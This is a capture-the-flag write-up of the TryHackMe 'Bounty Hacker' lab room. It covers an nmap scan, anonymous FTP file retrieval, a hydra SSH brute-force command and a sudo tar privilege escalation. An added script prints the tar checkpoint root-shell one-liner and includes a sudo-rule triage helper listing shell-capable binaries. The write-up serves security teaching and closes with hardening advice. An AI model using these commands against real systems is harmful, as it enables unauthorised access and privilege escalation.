TryHackMe Write-Up (Bounty Hacker)
In this capture-the-flag room we have a few tasks against one target.
Like always, we start with only an IP address: 10.10.6.212
Flags to capture are:
- Who wrote this task list
- What service can we brute force
- What is the user's password
- What are the flags in the user.txt and root.txt files
The first step I did was to run an Nmap scan to see what ports are open on the target. -sS is a SYN scan, -sC runs the default scripts, -Pn skips host discovery (useful when ping is blocked) and -oN saves the normal output to a file.
> nmap -sS -sC -Pn -oN bounty.txt 10.10.6.212
I can see a few ports are open:
Port 21 is a TCP port running an FTP server
Port 22 is a TCP port running SSH
Port 80 is a TCP port running HTTP, a web server
Let's do some basic research and open the target's IP in a web browser, since we can see it has an HTTP port open.
> http://10.10.6.212 in a web browser
We see a web page displayed.
- No clues. I did not find anything in the page source either.
From our Nmap report, we see that port 21 is FTP, and the ftp-anon default script reported that anonymous login is allowed. So let's try and log on with the username anonymous.
> ftp 10.10.6.212
When prompted for a login, we type the name anonymous and leave the password blank.
And we are logged in! No password was required. A perfect example of an unsecured service: anonymous FTP exposes whatever is in the served directory to anyone who can reach the port.
Within the anonymous user's directory, we can see some basic files that they have access to:
locks.txt and tasks.txt. The FTP get command downloads each file to our own machine.
> get locks.txt
> get tasks.txt
Once the files are downloaded, let's view them and see what we have obtained.
> cat locks.txt
> cat tasks.txt
Looks like a list of passwords to me, within locks.txt.
And we see a username within tasks.txt.
Our first flag is acquired! The name of the user who wrote tasks.txt. Let's continue.
- So far we have (port 22) SSH, which can be brute forced. SSH is a secure shell and gives access to the system if you have the correct credentials.
- We also have a file of candidate passwords.
- And we have a username.
Another flag was what service can be brute forced. SSH, of course :)
So let's try a brute force tool called hydra. Hydra is preinstalled on the Linux system we are using, so we simply run the hydra command with the username (-l), the password file we want to use (-P, capital; a lowercase -p would mean a single password), the service and the target IP address. The example is below
> hydra -l lin -P locks.txt ssh://10.10.6.212
We got in! Hydra tried those passwords against the username until it found the one the target accepted.
Another flag was obtained. We now have all the information needed for lin's login.
So let's SSH in as lin
> ssh lin@10.10.6.212
> enter the password we acquired from the hydra attack
And we are in! A simple > whoami command confirms this.
Let's poke around for a bit
> pwd tells us where we are
> ls tells us what is inside, and ls -a tells us everything that's inside, including hidden files
Cool! We see a file user.txt lets open it up!
> cat user.txt
And we have a flag!!!
Fun right?
So now we need root access!
Root is the king of the castle: knows all and makes all the decisions!
So, let's try to move over to root's home directory
> cd /root
cd is change directory
There is a /root directory!
But we have no access to it, and switching to root asks for a password we don't have!
I used sudo to list the commands that lin is allowed to run as another user
> sudo -l
and I was able to see that lin may run /bin/tar as root on this host
What is amazing about capture-the-flag events is that I learn a new tool every time.
I was able to find a curated list of Unix binaries that can be used to bypass local security restrictions.
This is all publicly available online and was found on GTFOBins.
On that site, I searched for tar and found its sudo entry: GNU tar can run an arbitrary command through a checkpoint action, so when tar itself runs as root via sudo, the command it spawns runs as root too. I put that publicly available one-liner into my terminal and got a root shell.
As root, I used a simple ls -a (list all) in /root to find the root.txt file.
Within that file, I found our last THM flag.
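To make the last step concrete, here is an added shell example (not part of the original write-up) with two helpers: flag_sudo_l triages "sudo -l" output for binaries that GTFOBins lists as able to spawn a shell, and tar_checkpoint_exec shows, without any sudo, the mechanism that makes /bin/tar dangerous: GNU tar's --checkpoint-action=exec= runs a command of the caller's choosing while archiving nothing of interest. The SUDO_L_SAMPLE text is constructed to mirror the shape of the room's output, the hostname in it is assumed, and SHELL_ESCAPE_BINS is a small hand-picked subset of the GTFOBins list, not the full list.

```shell
#!/bin/sh
# Added example, not code from the original write-up or from GTFOBins.
# On the target the same tar mechanism under sudo yields a root shell:
#   sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

# Subset of binaries known to break out to a shell when run via sudo (see GTFOBins).
SHELL_ESCAPE_BINS="tar vim vi find python python3 perl less more awk nmap env bash sh"

# Constructed sample mirroring "sudo -l" output on the room (hostname assumed).
SUDO_L_SAMPLE='Matching Defaults entries for lin on bountyhacker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User lin may run the following commands on bountyhacker:
    (root) NOPASSWD: /bin/tar'

# flag_sudo_l: read "sudo -l" text on stdin and print one line per rule whose
# command is ALL or whose basename is in SHELL_ESCAPE_BINS. Returns 0 if anything
# was flagged, 1 otherwise. Only lines of the form "(user) ... /path" are rules.
flag_sudo_l() {
    found=1
    while IFS= read -r line; do
        case $line in *'('*')'*) ;; *) continue ;; esac
        # Rules may list several commands separated by commas.
        for tok in $(printf '%s\n' "$line" | tr ',' ' '); do
            case $tok in
                ALL)
                    printf 'DANGEROUS: ALL (any command as the listed user)\n'
                    found=0 ;;
                /*)
                    bin=${tok##*/}
                    for known in $SHELL_ESCAPE_BINS; do
                        if [ "$bin" = "$known" ]; then
                            printf 'DANGEROUS: %s (%s can spawn a shell, see GTFOBins)\n' "$tok" "$bin"
                            found=0
                        fi
                    done ;;
            esac
        done
    done
    return $found
}

# tar_checkpoint_exec CMD: run CMD from inside a GNU tar checkpoint action and
# print its stdout. No privileges are involved here; run tar via sudo and CMD
# executes as root instead.
tar_checkpoint_exec() {
    tar --version 2>/dev/null | grep -q GNU || { echo "needs GNU tar" >&2; return 2; }
    out=$(mktemp) || return 1
    # -cf /dev/null /dev/null : "archive" /dev/null, writing the archive to /dev/null
    # --checkpoint=1          : fire a checkpoint after every record written
    # --checkpoint-action=exec=... : tar hands the string to "/bin/sh -c"
    tar -cf /dev/null /dev/null --checkpoint=1 \
        --checkpoint-action="exec=$1 > $out" >/dev/null 2>&1
    cat "$out"
    rm -f "$out"
}

# Usage: triage the sample, then prove tar executes our command.
printf '%s\n' "$SUDO_L_SAMPLE" | flag_sudo_l
echo "command run from inside tar as user: $(tar_checkpoint_exec 'id -un')"
```

The triage helper is the check a defender (or a pentester reviewing a host) wants: any sudo rule pointing at a GTFOBins binary is equivalent to granting a root shell, so the fix is to remove the rule or restrict it to a wrapper script with fixed arguments, not to rely on the binary "only archiving files".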
This capture-the-flag room was significant to me because it showed how an unsecured service combined with weak credentials can play a key role in a vulnerable network, and that isn't even mentioning the plaintext passwords sitting in a file on an anonymous FTP share. Simple security practices can be applied to many types of servers: disable anonymous FTP, don't store passwords in plaintext, use key-based SSH logins with rate limiting, and keep sudo rules minimal. Regular vulnerability scanning along with the implementation of these controls is paramount.